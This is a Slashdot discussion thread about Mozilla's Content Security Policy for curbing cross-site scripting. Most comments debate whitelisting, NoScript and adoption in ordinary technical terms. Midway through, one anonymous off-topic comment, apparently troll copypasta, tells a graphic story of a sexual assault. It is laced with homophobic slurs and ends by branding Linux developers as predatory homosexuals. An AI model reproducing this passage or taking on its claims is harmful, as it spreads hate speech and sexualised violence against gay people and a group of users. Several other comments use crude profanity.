×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

New Firefox Standard Aims to Combat Cross-Site Scripting

ScuttleMonkey posted more than 4 years ago | from the fight-the-good-fight dept.

Security 160

Al writes "The Mozilla foundation is to adopt a new standard to help web sites prevent cross site scripting attacks (XSS). The standard, called Content Security Policy, will let a website specify what Internet domains are allowed to host the scripts that run on its pages. This breaks with Web browsers' tradition of treating all scripts the same way by requiring that websites put their scripts in separate files and explicitly state which domains are allowed to run the scripts. The Mozilla Foundation selected the implementation because it allows sites to choose whether to adopt the restrictions. 'The severity of the XSS problem in the wild and the cost of implementing CSP as a mitigation are open to interpretation by individual sites,' Brandon Sterne, security program manager for Mozilla, wrote on the Mozilla Security Blog. 'If the cost versus benefit doesn't make sense for some site, they're free to keep doing business as usual.'"

cancel ×
This is a preview of your comment

No Comment Title Entered

Anonymous Coward 1 minute ago

No Comment Entered

160 comments

as an end user (2, Insightful)

Anonymous Coward | more than 4 years ago | (#28520787)

I really hope the default policy is "only allow scripts from the current domain" and "do not allow the site to override my choice".

Re:as an end user (3, Informative)

seifried (12921) | more than 4 years ago | (#28520937)

It doesn't quite work that way, it's much more fine grained, i.e. as a site owner I can say something like:

allow /foo/bar.cgi?weird looking strings and block anything else

so if an attacker finds a cross-site scripting flaw in say "/login.php" the client won't accept it, protecting my client, and protecting the site owner as well (bad guys aren't harvesting credentials from users, etc.).

Re:as an end user (1)

kill-1 (36256) | more than 4 years ago | (#28523755)

No, CSP doesn't work like that. You can't specify path patterns or something like that. If you have an XSS flaw on your site an attacker still can inject scripts. But the scripts won't get executed because CSP only allows external scripts from white-listed hosts.

Re:as an end user (1)

seifried (12921) | more than 4 years ago | (#28523983)

Ack I must have been thinking of mod_security, my bad. OTOH you can limit stuff by file/etc to a pretty good degree using site security policy and achieve pretty much the same aims.

Re:as an end user (1, Funny)

sexconker (1179573) | more than 4 years ago | (#28520979)

As an end user I really hope that the sites I visit have a default policy of "we only serve up our own shit". ...

Fuck.

Re:as an end user (2, Interesting)

Arker (91948) | more than 4 years ago | (#28522949)

I really hope the default policy is "only allow scripts from the current domain" and "do not allow the site to override my choice".

Noscript does this.

Which brings me to the observation that, at least as far as I can tell from the blurb, this entire thing sounds a bit redundant in light of the ready availability of Noscript. Why not just make it part of the default firefox install instead?

Good idea (0, Redundant)

thetoadwarrior (1268702) | more than 4 years ago | (#28520793)

As long as this isn't something that can easily be compromised then I think this is an excellent way of handling the problem.

Re:Good idea (4, Insightful)

NecroPuppy (222648) | more than 4 years ago | (#28520833)

First thoughts on that:

If I say that my site trusts domain1.com, but domain1.com isn't using this and ends up having all sorts of dodgy scripts they're passing along, would this block them, or would they count as coming from domain1.com?

Re:Good idea (1)

sexconker (1179573) | more than 4 years ago | (#28520963)

When content is fed to you by/through domain1.com, do you see it as coming from domain1.com?

If the answer to that is YES, then you're FUCKED if domain1.com is serving up shit.

Re:Good idea (5, Interesting)

the_other_chewey (1119125) | more than 4 years ago | (#28521209)

If I say that my site trusts domain1.com, but domain1.com isn't using this and ends up having all sorts of dodgy scripts they're passing along, would this block them, or would they count as coming from domain1.com?

Domain1 woudn't need to use this - this is a client-side security measure. If your site uses it and declares trusted third-parties, it's enough.
Also, what is "passing along" supposed to mean? Scripts (or any other stuff) would either come from domain1 or not. If not, it wouldn't be trusted.
If domain1 proxies scripts from other sources, this means they come from domain1, as far as HTTP is concerend - and they would be trusted.

The problem I see however is domain1 declaring additional trusted domains when delivering its scripts, thereby allowing for "cascaded domain trust", which
would pretty much defeat the new system. This can easily be prevented by not accepting additional trusted domains from elements that are third-party though.

Re:Good idea (1)

CarpetShark (865376) | more than 4 years ago | (#28521725)

As long as this isn't something that can easily be compromised then I think this is an excellent way of handling the problem.

From the summary:

The standard, called Content Security Policy, will let a website specify what Internet domains are allowed to host the scripts that run on its pages.

As long as this "standard" is the one called HyperText Markup Language, then this makes sense. HTML is intended to say what scripts run on a page. If that's broken, then the HTML should be fixed. Somehow I suspect it's not broken, but that developers' implementations of sites are.

Managers (1)

uassholes (1179143) | more than 4 years ago | (#28520811)

"The Mozilla foundation is to adopt a new standard to help web site's prevent cross site scripting attacks (XSS). The standard, called Content Security Policy

Do you notice that name does not sound like the description? Why do they never call it what it is?

Re:Managers (1)

EvanED (569694) | more than 4 years ago | (#28521045)

If you'll notice, CSS was already taken for web-stuff, and X often means "cross", so it does actually make sense.

Re:Managers (1)

leamanc (961376) | more than 4 years ago | (#28522355)

If you will notice, he meant that "Content Security Policy" as a name is less effective than, say, "Cross-Site Scripting Prevention Policy." He was not talking about XSS as an acronym.

Re:Managers (2, Informative)

maxume (22995) | more than 4 years ago | (#28522493)

It extends well beyond scripts into other content areas. It can be used to limit the domains that are allowed to serve images, css, and so on (this is all for a given page).

No more hacking anti piracy organizations? (0, Offtopic)

basementman (1475159) | more than 4 years ago | (#28520821)

So does this mean we can't hack anti piracy organizations any more? http://torrentfreak.com/mpaa-website-now-with-torrents-090502/ [torrentfreak.com] http://torrentfreak.com/riaa-site-features-torrentfreaks-latest-news-090504/ [torrentfreak.com]

How does this change userland? (4, Insightful)

Red Flayer (890720) | more than 4 years ago | (#28520823)

I will still run with noscript installed because I've yet to see a good XSS-preventing implementation that will allow *me*, as a user, to easily define what sites can run scripts on the sites I visit. And when I visit a site where I need to disable noscript, I have no other tabs/browsers open.

I'm sorry, but NO site can be trusted 100% from a user's perspective... and giving site owners the tools to help prevent XSS from their side doesn't help with the fact that users still shouldn't trust absolutely.

The reason something like this scares me is that it lulls users into a higher level of trust... and doesn't protect them from hacked sites, or sites that choose not to implement this.

Of course, I'm slightly paranoid. And of course, this isn't transparent to Joe Sixpack, so he's going to trust|!trust based on whatever it is he's basing it on now. And for security-critical sites like banks, this is a good thing... but I try very hard to make sure my friends & family are a bit paranoid too, so they'll take precautions.

Re:How does this change userland? (0)

Anonymous Coward | more than 4 years ago | (#28520995)

I will still run with noscript installed because I've yet to see a good XSS-preventing implementation that will allow *me*, as a user, to easily define what sites can run scripts on the sites I visit.

Combine RequestPolicy [mozilla.org] with YesScript [mozilla.org]

Re:How does this change userland? (1)

TheRealMindChild (743925) | more than 4 years ago | (#28521019)

I will still run with noscript installed because I've yet to see a good XSS-preventing implementation that will allow *me*, as a user, to easily define what sites can run scripts on the sites I visit

Dude. How are *you* going to know that it is ok to run scripts on Slashdot.org that originate from slashdotscripts.com and not scriptsforslashdot.com? Even if you are a lunatic and micromanage the trusted sources of these scripts, how would selectively running any of them do you any good? I would imagine almost all sites are going to break horribly of you only enable HALF of the scripts, where flat out disabling them/running all scripts will give you a working site.

Re:How does this change userland? (3, Insightful)

Red Flayer (890720) | more than 4 years ago | (#28521215)

How are *you* going to know that it is ok to run scripts on Slashdot.org that originate from slashdotscripts.com and not scriptsforslashdot.com? Even if you are a lunatic and micromanage the trusted sources of these scripts, how would selectively running any of them do you any good?

Dare I say it?

Site XXXX is attempting to run a script on site YYYY.
(C)ANCEL or (A) LLOW?

All snark aside, why would I allow either of those domains to run a script on slashdot.org? Since I trust slashdot to a certain extent, I would allow from scripts.slashdot.org. But allowing scripts from a completely different domain? No way.

The point is that my security policy is annoying to implement. For site mybank.com I need to enable scripting. But if things were perfect, I could enable only for scripts from $SUBDOMAIN.mybank.com, so I don't get hosed by scripts from $HACKERSITE.bankmy.com. And if legitimate sites are hosting their scripts from an entirely different domains... well, that would have to change. Instead I have to take an all-or-none approach, since the sites I need security the most on are the ones where I need to enable scripting. That just sucks.

Re:How does this change userland? (2, Insightful)

maxume (22995) | more than 4 years ago | (#28521459)

Slashdot is currently pushing js from c.fsdn.com.

I think you have a pretty dim view of the ecosystem (or maybe you are viewing some really marginal sites, who knows). For the most part, a given page that you visit is not going to contain malicious code that sniffs for when you have a https cookie for your banking site and then mysteriously steals all your money. I say this confidently, as I am quite certain that the bad guys are much happier with the simpler task of installing mal-ware keyloggers.

The only browser exploit I have personally encountered came from the server getting compromised (well, the account for a domain, probably not the whole server); obfuscated javascript had been appended to the bottom of a javascript file that the page loaded (the attack was a pdf, but I had that particular exploit locked down (or it didn't work in the version of Reader I use...), so no issues). Entertainingly, it was a blog post about web security (I let them know and they fixed it).

Re:How does this change userland? (1)

Red Flayer (890720) | more than 4 years ago | (#28522455)

And I know that fsdn.com is also a trusted site.

You're right that I'm not the most knowledgeable (to put it lightly) about the ecosystem. However, I think it's atrocious that I cannot easily and selectively block scripts from operating on sites I want to view. And not just for the sake of security... also for the sake of performance on older machines.

Re:How does this change userland? (1)

maxume (22995) | more than 4 years ago | (#28522693)

By 'dim', I meant that you have an overly negative view, I wasn't speculating as to your level of knowledge.

Re:How does this change userland? (1)

v(*_*)vvvv (233078) | more than 4 years ago | (#28523547)

why would I allow either of those domains to run a script on slashdot.org?

You wouldn't. Slashdot would. This is about the site creator specifying a white list, and not about the visitor being prompted about it.

But if things were perfect, I could enable only for scripts from $SUBDOMAIN.mybank.com, so I don't get hosed by scripts from $HACKERSITE.bankmy.com.

Am I misunderstanding the description of this extension, because to me this sounds exactly like what it does. You enable scripts from domains you specify. Thus, no javascript injections or form hacking will get a page to retrieve foreign scripts without the attacker being able to physically alter the document.

Re:How does this change userland? (2, Interesting)

Anonymous Coward | more than 4 years ago | (#28521361)

That reminds me -- since recently I have to tell NoScript to allow scripts from fsdn.com in order to browse slashdot.org successfully. I *know* that FSDN is slashdot's parent company, but it doesn't seem right that I can't use slashdot's discussion interface without giving permission to all of FSDN.

Similarly, recently I have to allow gstatic.com and/or googleapis.com to use Google-enabled websites that worked fine before.

Like the parent post's point: it's getting harder for a user to selectively narrow permissions down.

Re:How does this change userland? (1)

hedwards (940851) | more than 4 years ago | (#28521027)

Well, it irritates me to no end that there isn't a mandatory listing of all the sites that serve scripts for them complete with some sort of explanation.

I absolutely hate having to figure out which domain that I've blocked that will allow access to the content and which ones are dodgy. And further whether the site that's serving up the content is safe enough to allow.

Re:How does this change userland? (1)

Red Flayer (890720) | more than 4 years ago | (#28521289)

If you're slightly paranoid like I am, how would you know to trust the provided list of "trusted script serving sites"?

At some point, you need to trust *someone* to tell you who else you can trust... and that'll always be a problem.

Re:How does this change userland? (1)

Jurily (900488) | more than 4 years ago | (#28522375)

What irritates me is that all the browsers I've ever heard of run everything they can by default. The only distro coming even close to something sane is Gentoo with the "restrict-javascript" USE flag with firefox (that pulls in noscript, but still does not enable it by default).

Of course I can't know about everything, feel free to correct me.

Re:How does this change userland? (0)

Anonymous Coward | more than 4 years ago | (#28523021)

You know what's even more insane? After installing an application, it defaults to executable! Can you believe that?!

Re:How does this change userland? (1)

Jherek Carnelian (831679) | more than 4 years ago | (#28521287)

Indeed, I wish noscript would allow me to whitelist domains and even specific scripts on a per-site basis. So, for example, I could whitelist maps.google.com's use of javascript from gstatic.com but not allow any other sites, like images.google.com, to pull in javascript from gstatic.com.

Re:How does this change userland? (1)

oldhack (1037484) | more than 4 years ago | (#28521409)

I second "yay!" for Noscript. You have no idea how tangled commercial websites are until you use noscript.

eBay and MySpace? (3, Insightful)

POWRSURG (755318) | more than 4 years ago | (#28521523)

CSP is effectively server-side NoScript. And it isn't exactly new either. This has been in development as a Firefox extension for at least a year. The article mentions it being first crafted back in 2005.

The issue I take with this article is that they suggest this feature could even possibly be integrated into eBay or MySpace. These two giants seem like the exact opposite type of market that would use this -- any site that allows users to post their own data is not going to possibly survive the wrath they would catch if users had to explicitly allow the domains they want scripts to run on. For a corporate Web site yes, but for something for the masses or those of us that run a CMS? I don't see that as happening anytime soon.

Re:eBay and MySpace? (2, Informative)

kill-1 (36256) | more than 4 years ago | (#28523823)

Apparently, you have no idea what XSS means. Neither eBay or Myspace allow the execution of user-provided scripts for obvious reasons. Given the market share of Firefox, the big sites will implement CSP pretty soon.

Re:How does this change userland? (1)

MikeFM (12491) | more than 4 years ago | (#28523703)

I've been suggesting a fix like this for years but my suggested implementation let users have add further limitations. It's stupid not to let users tighten controls even if they can't make controls any weaker than the site has configured. You'll never have perfect security but at least this is a step in the right direction.

SPF for JavaScript (1, Redundant)

The Yuckinator (898499) | more than 4 years ago | (#28520831)

On the surface this sounds like a great idea. Sort of like SPF for JavaScript. Of course I'm sure that more knowledgeable folks than I will do their best to poke holes in it. I guess the other browsers will just ignore this unless of course they jump on board and implement it too.

Re:SPF for JavaScript (2, Funny)

the_other_chewey (1119125) | more than 4 years ago | (#28521249)

I guess the other browsers will just ignore this unless of course they jump on board and implement it too.

Exactly. Also, it will rain tomorrow. Unless it doesn't.

Cost vs. Benefit? (3, Interesting)

spydabyte (1032538) | more than 4 years ago | (#28520883)

If the cost versus benefit doesn't make sense for some site, they're free to keep doing business as usual.'

The author gave the best reason for not implementing this.

The benefits of this, and other various security implementations, won't be seen until it's tested. The costs of testing? Way too high compared to the current cost of operation. This is a very hard proof-of-concept problem, and unless this is already built into development standards, I doubt any deployments would switch.
Which would you take, the option which delays production for a week, or the option to just hit "next"?

Re:Cost vs. Benefit? (1)

hedwards (940851) | more than 4 years ago | (#28521055)

Of course it doesn't. For the most part sites that are vulnerable aren't made to pay for the damage that their lack security has caused. If we forced sites to pay for their mistakes, that would change things really fast.

The TD Ameritrade settlement for instance was an absolute joke, they ended up losing a lot of personal information and then they ended up with a slap on the wrist. It's not going to be cost effective for organizations to secure their sites as long as they're free to pass on the cost to the end user.

Article on this and related technologies (2, Interesting)

seifried (12921) | more than 4 years ago | (#28520897)

Shameless self plug: I wrote about this in my column: Web security - Protecting your site and your clients [linux-magazine.com] in September of 2008 and I'm VERY glad to see this is moving forwards as it means I (as a site owner) can actually do something to protect my site and my users against flaws in my site that is relatively easy and non-intrusive (that's the key!). The thing I really love about this is if your clients don't support site security policy, things still work, and if your browser supports it but the remote web site doesn't, things still work, but if both ends support it you get a nice added layer of protection. What would be really wild is if Microsoft added support for it, although "not invented here" they have been making efforts to protect users from XSS attacks in IE8 with mixed success, so who knows. You can do similar things with mod_security potentially and outgoing filters but it is nowhere near as simple as site security policy should be to deploy (hopefully).

Re:Article on this and related technologies (1)

michaelhood (667393) | more than 4 years ago | (#28521629)

I (as a site owner) can actually do something to protect my site and my users against flaws in my site that is relatively easy and non-intrusive (that's the key!).

Unless your users run something besides Firefox.

If MS did this we'd all be crying about how this isn't sanctioned by W3C, and it's "embraceandextend" (tag?).

Re:Article on this and related technologies (2, Informative)

node 3 (115640) | more than 4 years ago | (#28521791)

If MS did this we'd all be crying about how this isn't sanctioned by W3C, and it's "embraceandextend" (tag?).

Extinguish.

It's Embrace, Extend, Extinguish. That last E makes all the difference in the world.

Use a file? (1, Interesting)

Anonymous Coward | more than 4 years ago | (#28520905)

Instead of making me modify each file to send that header/meta tag, why not make it like the flash security files and just have a file in the root directory.

You're doing it wrong (1, Flamebait)

XanC (644172) | more than 4 years ago | (#28520959)

If you're having to modify individual files to set HTTP headers, you're doing it wrong. Also, polluting sites' namespaces (even worse than they already are with robots.txt/favicon.ico) is a bad idea.

But then, you already betrayed your cluelessness when you revealed that you put Flash on the Web.

Re:You're doing it wrong (0)

Anonymous Coward | more than 4 years ago | (#28521005)

I didn't say I used flash did I? I just used the flash file as an example.

Re:Use a file? (1)

EvanED (569694) | more than 4 years ago | (#28521095)

Oh, please don't do that. Don't assume that we have rights to that directory. I already really really wish I could set robots.txt for just my subdirectory, but no can do since some semi-moron thought it would be a good idea to make me mail my school department's webmaster to exclude part of my directory.

Re:Use a file? (1)

seifried (12921) | more than 4 years ago | (#28521123)

You could simply use .htaccess and restrict based on user agent. Ugly, lots of over head (request = hit .htaccess), but it would work (at least for polite robots, but this is also true of robots.txt).

Re:Use a file? (1)

EvanED (569694) | more than 4 years ago | (#28521243)

Ugly, lots of over head...

And requires me to figure out the useragent of either every browser out there (to allow) or every bot out there (to deny). At least, as far as I can tell.

Re:Use a file? (1)

seifried (12921) | more than 4 years ago | (#28521353)

No, just block the common ones (googlebot and yahoo slurp are the majority of it). If you're actually trying to protect this content then you need to password protect/etc. it, robots.txt is not the way to prevent exposure. As well you could also use the meta tag in HTML documents:

meta name="robots" content="noindex"

But I agree, robots.txt is far less painful and much quicker. Thing to remember as well when robots.txt was invented the web was a much simpler place and everyone online was pretty much skilled in the art by definition.

Re:Use a file? (2, Informative)

michaelhood (667393) | more than 4 years ago | (#28521805)

Ugly, lots of over head...

And requires me to figure out the useragent of either every browser out there (to allow) or every bot out there (to deny). At least, as far as I can tell.

No, only "bots" (spiders, nowadays) actually check robots.txt, per the RFC. User-initiated requests don't/shouldn't (no browser I've ever seen) do not request/parse robots.txt.

Re:Use a file? (0)

Anonymous Coward | more than 4 years ago | (#28523623)

Which would be a relevant comment were they not talking about .htaccess files rather than robots.txt

Re:Use a file? (1)

jonbryce (703250) | more than 4 years ago | (#28521283)

And can you be sure you have all the legitimate user agents?

Certainly ie, mozilla, safari, chrome and opera will cover most of the desktop / laptop user agents, but what about all the obscure browsers used on phones and other mobile devices?

Re:Use a file? (1)

michaelhood (667393) | more than 4 years ago | (#28521727)

Oh, please don't do that. Don't assume that we have rights to that directory. I already really really wish I could set robots.txt for just my subdirectory, but no can do since some semi-moron thought it would be a good idea to make me mail my school department's webmaster to exclude part of my directory.

You can do everything that you do with robots.txt via robots meta tags [robotstxt.org] and streamline their inclusion with some server-side scripts if so desired.

Old Standard to Prevent All Attacks (0, Troll)

sexconker (1179573) | more than 4 years ago | (#28520935)

Don't let other people serve content via your site.

Don't rely on shitty plugins from security failures such as Adobe.

Don't depend on user-generated content, since it's shit. If your site can't provide it's own content, at least properly filter incoming user content down to plain ol' text.

Don't sign up with a shitty registrar who will transfer your domain/dns/mx records to some slut like godaddy at the drop of a hat.

Don't give people the password to your account at your host/registrar, and don't give people access to your fucking ftp/ssh/direct/etc. accounts for your server.

Re:Old Standard to Prevent All Attacks (1)

Red Flayer (890720) | more than 4 years ago | (#28521009)

Don't depend on user-generated content, since it's shit. If your site can't provide it's own content, at least properly filter incoming user content down to plain ol' text.

Hey! It doesn't need to be plain ol' text.

As a theoretical, it could be hamstrung html that pisses off some users by not recognizing UTF-8 in order to prevent malicious posting.

Or something. I'm sure we could figure out a decent implementation.

Re:Old Standard to Prevent All Attacks (1)

seifried (12921) | more than 4 years ago | (#28521071)

Don't let other people serve content via your site.

Problem is that security flaws such as cross-site scripting (XSS) allow exactly this (insert arbitrary HTML/JavaScript into the page which is then rendered by the client browser.

Re:Old Standard to Prevent All Attacks (1)

EvanED (569694) | more than 4 years ago | (#28521171)

Don't depend on user-generated content, since it's shit.

Says the person providing user-generated content to a site that depends on it.

Re:Old Standard to Prevent All Attacks (2, Informative)

jonbryce (703250) | more than 4 years ago | (#28521307)

Don't depend on user-generated content, since it's shit. If your site can't provide it's own content, at least properly filter incoming user content down to plain ol' text.

I suggest you resign from Slashdot as soon as possible then ...

Re:Old Standard to Prevent All Attacks (2, Interesting)

sexconker (1179573) | more than 4 years ago | (#28521679)

Why is this modded troll?

99.99999% of attacks are the result of:

Malicious ads and clickthrough "offers" after a sale is processed
Vulnerabilities in PDF, Flash, etc.
Malicious content uploaded by users (javascript, sql injection, malformed jpegs, what have you)
Domain hijacking
General "LOL I GOT UR PASSWORD" shenanigans

Re:Old Standard to Prevent All Attacks (2, Interesting)

Runaway1956 (1322357) | more than 4 years ago | (#28523309)

Sexconker is modded a troll - quite unfairly. Cross site scripting sucks. Simple as that. I go to a site, first thing I see is noscript's popup message that anywhere between 2 and 20 sites want to run scripts in my browser. I click the popup, to see WHO wants to run scripts. Sometimes, it's easy to see who wants to do what, and deciding to allow site a, but not site b is quite simple.

Often enough, it's just not that simple. I want to see some stupid flash presentation, and the only way to see it is to enable flash. Unfortunately, three different sites are offering a flash. Which one do I want? I choose one to be allowed, and I get rickrolled.

That is hamshite. Nothing more, and nothing less. The original site should be hosting it's own material, or they should supply the link to see the flash presentation. Cross site scripting is a ripoff that just helps to confuse the security conscious. And, God knows there are far to few users who are conscious. (I'd like to see a scientific poll that demonstrates just how many users really are brain dead - it has to be over 20%, and might be over 50%)

Some History (1)

eplawless (1003102) | more than 4 years ago | (#28520951)

I know there's been a lot of dialogue between the authors of SOMA [carleton.ca] , which predates this, and the Mozilla team; it might provide some interesting context.

Headline: Google other ad publishers revenues drop (2, Interesting)

rescendent (870007) | more than 4 years ago | (#28520999)

Presumably the millions of adsense and publishers will have to enable their sites to maintain adverts..? Might hit google revs a bit...

Re:Headline: Google other ad publishers revenues d (1)

RalphSleigh (899929) | more than 4 years ago | (#28521263)

Obviously if a site does not contain one of these headers it will default to allow from all. Also called not breaking the whole internet with your new browser feature.

This is great for Firefox users... (2, Interesting)

randomnote1 (1273964) | more than 4 years ago | (#28521029)

What about IE, Chrome, Opera, and Safari users? As of now this solution only benefits a small portion of users. I don't see this being widely implemented at all.

Re:This is great for Firefox users... (2, Insightful)

hansamurai (907719) | more than 4 years ago | (#28521301)

Well, if Firefox users find it effective, then other companies will follow suit. It's just a standard Mozilla is adopting, though it seems to have been defined in house, that won't stop anyone else from using it.

Re:This is great for Firefox users... (1)

Vectronic (1221470) | more than 4 years ago | (#28521461)

IE has an XSS Filter... I don't use IE enough to have bothered to investigate it though, otherwise Opera, Safari, Chrome, don't seem to be doing anything special about XSS, at least not advertising it, other than patching their own vulnerabilities against a few known methods.

Re:This is great for Firefox users... (1)

dveditz (11090) | more than 4 years ago | (#28523681)

Even if this was never implemented in any other browser sites still benefit through early detection of active attacks. If your site implements a security policy with a report URI then every Firefox visitor will be conducting a passive security scan on every page they visit, at least for the types of security problems CSP targets (primarily XSS).

The Linux Party (-1, Offtopic)

Anonymous Coward | more than 4 years ago | (#28521031)

First, there was a plan: how to bring together the two different development groups at work? My boss said there was a sort of tension he thought could be eased by some social interaction. Not easy. Both the different development groups despised one another, each thinking its "art" was more important and eloquent than the others'. [trollaxor.com]

First there was the XML group. They worked on our website, documentation and formatting, and simple configuration apps and some front-ends to Java stuff. They also did our web sites. They used CSS, HTML, XSL, JavaScript, and a bit of Java. They typically dressed casually, drank coffee and tea, and liked to work straight from the spec: no "Learn XSL in 30 Days" books were to be found in their cubicle farm.

Then we had the Linux developers. They worked "special hours," coming in at one and staying late, supposedly, until seven or eight at night. They enjoyed Bawls and had a penchant for ThinkGeek t-shirts and cracking jokes about Win32 API calls and the dreaded Blue Screen of Death. They all had beards or mullets or long, unwashed hair. Some had penguin or C code tattoos. Their cubicle farm was known for the bleating laughter that exploded when one of them found a silly bug on someone else's code, and for the rotten, fetid stench that could only be compared to three-day-old shit reeking from inside a rotting corpse's abdominal cavity.

So, in order to get the guys to get to know each other, my boss had asked me to organize a during-hours, alcohol-friendly party. My ideas ranged from a keg or two to live entertainment, AKA strippers. But as to what to get them to actually talk to each other in a human manner I had no clue. So I let it go til the last minute and decided to let my inherent creativity mull it over in the back of my head.

When the day of the party had arrived, the catering company brought in a few trays of lunch meat, chicken, pizza, and side dishes, I had picked up the four kegs from the local brewery, and the big-screen TV and DVD were set up ready to blast the Matrix into the eyes and ears of my co-workers. The eagerness in the the air was encouraging and I thought that loosening up and smiles going on even now were a good sign. I even saw some of the guys who'd known each other previously begin to bunch up, bringing along the co-workers they knew from everyday work.

The first thing everyone did was hit the food line, loading up their plates and grabbing a cup for beer to wash it down with. A few approached me and thanked me for the food; it seems appeasing the belly really did tame the beast. After a few minutes of silence and eating and a few second and third courses, they guys were ready to sit down and be entertained. After asking if anyone needed anything else before the movie started, the lights went out and the Matrix began playing. I heard a few enthusiastic comments and jokes being told.

About half-way through the movie I noticed a lot of the Linux guys getting up and presumably going to the restroom. No suprise, as the second keg was history by now and the third was probably half-way gone. I also noticed some of the guys bumping into things and stumbling. Alcohol's the social lubricant, eh? Well, not long after, my bladder beckoned and I answered. As I made my way to the restroom, I had a self-satisfied smile on my face: my little plan was working, my boss would be happy, and it might even a Christmas bonus or a promotion (even if in title only).

Well, as soon as I pushed the restroom door open, I knew something was wrong. The smell of vomit was pretty strong and I hoped that it'd only been the work of one guy. But the smell was so pungent! After standing at the urinal, waiting for the golden flow to commence, I stood in silence. It was then that I heard grunting. Listening intently for a few seconds, I hoped whoever was upchucking their beer and munchies wasn't leaving a huge mess for the cleanup crew. After pissing and still hearing the noise, I approached the stall the that moaning was coming from.

"Hey, you alright in there, man?" I asked cautiously.

I was met by silence for a moment. Then I heard a few grunts and concealed giggles. Something was up in there. It was then that I heard what sounded like crying and more moaning. What the fuck? I decided I needed to see what was going on. I didn't want this party to come crashing down around my ears. I pushed the door open hard and then gasped as I saw the most sordid, disgusting thing I'd ever seen in my life.

Standing on either side of the toilet were two of the Linux developers, their beards caked with vomit, their pants in puddles around ankles, with erect penises wagging in the air. Doubled over the toilet, his head nearly dunked in the swill, was one of the XML developers. His pants were also around his ankles and what appeared to be a combination of blood and semen were dripping from his torn, ragged anus. He was covered in vomit from head to toe, and he was crying hard into the toilet bowl, its echo an eerie accompaniment to the awful scene I was seeing but not believing.

They two Linux developers slowly turned and looked me straight in the eye, evil grins smeared across both of their bearded faces.

"What the fuck are you doing!?" was all I could force out of my mouth. I still wasn't believing I was seeing this.

Saying nothing, both of the Linux guys rushed me. Being in such a tense state, I threw both of them off and made a break for the door. And the fucking thing wouldn't open. In the following two seconds that seemed like an eternity, the door was pushed open my way and two more Linux coders came in. Upon seeing what was happening, they immediately grabbed me and were joined by the first two. I was trapped. Then the one guy, who was a dead-ringer for Rasputin, the mad Russian monk, gazed into my eyes and said in a feminine voice, "Looks like Mr. Party is gonna get a taste of the real action!" and cackled insanely.

Cold sweat spurted from the pores on my foreheads and cheeks as I was dragged by the four stinking, polluted hippies into the same stall their previous victim was in.

"Thanks for the pizza and beer," Rapsutin said, "now it's time for the weeners and buns!"

Immediately the first two slogged their pants off and got down on their knees. The other two put there knees in my back and held me on top of the first victim, who now appeared to be unconscious. I heard their belts coming off and their zippers coming down, and some rustling around told me that their pants were coming down also. Then the first two started sucking off the other two, in what I could only call the most enthusiastic blowjobs I'd ever seen in my life. The moaning and slurping sounds turned my stomach and I retched. I could see why the first guy might have vomited.

Eventually Rasputin and his cohort started moaning more loudly, and one of them said "fifteen seconds." This was followed by a series of rapid-fire belching and burping that shook me up and down on the guy underneath me. After about fifteen seconds, all Hell broke loose. The two guys behind me started vomiting on the two guys fellating them and I saw cumshot shoot and mix with the vomit all over the two cocksuckers' faces. It was then that I almost lost it. I finally did refund when the first two vile fluids were followed by streams of piss. I heard swallowing and dripping and I yacked all over their first victim's head.

Rasputin cried out like a little girl in ecstasy. "Oh god, I'd been waiting for that all night! This party fuckin' roxorz my coxor!"

Now it was my turn, it seemed, as all four started tearing my pants down. Chunks of vomit-piss-semen fell on my back and soaked through my t-shirt. It was revolting. I shuddered as I felt their cold, clammy hands in my ass-crack and a very indelicate reacharound on my ball-sack. At this point I had no idea who was doing what, and I was just praying that I'd wake up and realize I was drunk and dreaming.

Just then I heard the door boom open and my boss's voice fill the air. The stall door was open and he saw right away the turgid scene transpiring in front of him. His voice was immediately followed by two others, XML developers I knew, and they flew into the stall as best they could and began a fight to save my asshole. The poor guy underneath me had just woken up and started struggling and the extra weight of eight other bodies in the stall must have been suffocating.

"It'll be all right, buddy," I said to him.

Within thirty seconds I was to my feet and was delivering the most heart-felt kicks to the guts of the rapist faggot Linux coders. Between me, my boss, and the two XML developers, we had the gang of four knocked out in a sloppy, excrement-filled pile of hairy body.

It's now been a month since this horrible incident and I am in regular therapy with a sexual abuse counselor. In response to the terrible outcome of this party, my boss toyed with the idea of selling the group off to another company, sans the four hippies who'd been fired and arrested. After considerable urging on my part, and very open ear from my boss, the whole group was dissolved and the Linux coders lost their jobs. Their product was delayed by a year as my boss began hiring a new development team. We'd found evidence that the whole group had been involved in the planning of the gang-bangs and that had it not been for us everyone would have had a turn in the stalls.

If there's one thing we learned from this tragedy it's that Linux developers, users, and advocates are desperate cock-lusting homosexual faggots that can't be trusted in any situation, let alone a restroom setting. You've been warned. On the positive side, though, the whole incident brought solidarity between the other groups in the company and I am now on schedule to get a huge Christmas package that not only includes a gigantic bonus but a month's worth of paid time off and a real promotion.

A step in the right direction (1)

Ambush Commander (871525) | more than 4 years ago | (#28521047)

The first trap you will fall into thinking about this is that it should be the end-all security policy, and will solve our problems. It won't. That's not the intent, and also impossible given our diverse browser ecosystem.

The ability to tell the browser, via out-of-band, non XSS-able information, that certain scripts should not be executed, however, is a very powerful defense in depth measure, and makes it one step harder for attackers to make an attack work.

Security is a war of attrition. Bring it on.

NOT a standard (3, Informative)

Curate (783077) | more than 4 years ago | (#28521051)

The summary is wrong, this is NOT a standard in any way, or even a proposed standard. This is a proprietary security feature being introduced by Firefox. I'm not saying this is a bad thing (it's not), or that this won't eventually become a de facto standard (it might). But it is not a standard.

Re:NOT a standard (0)

Anonymous Coward | more than 4 years ago | (#28521541)

They explain how it works and it's open source. How can you call that proprietary? Maybe it hasn't passed through a standards body, but that doesn't mean it can't be freely implemented for any other browser.

Re:NOT a standard (1)

Curate (783077) | more than 4 years ago | (#28521915)

Sure, they've published the spec, but that doesn't make it non-proprietary. Is it controlled by Firefox or by a neutral standards body? There are lots of analogies to this. e.g. Microsoft has openly published the SMB spec, yet they control it; it is proprietary. Or maybe we have different interpretations of the word "proprietary"? In any case, I did not mean to emphasize the word "proprietary" or any connotations that word may evoke. I used that word in my post but it wasn't the main point of my post. My main point is that this is a not a standard. Calling this new feature a standard actually dilutes the meaning of the word "standard". Can we just call almost any new feature a standard?

Standard? (2, Informative)

pablodiazgutierrez (756813) | more than 4 years ago | (#28521113)

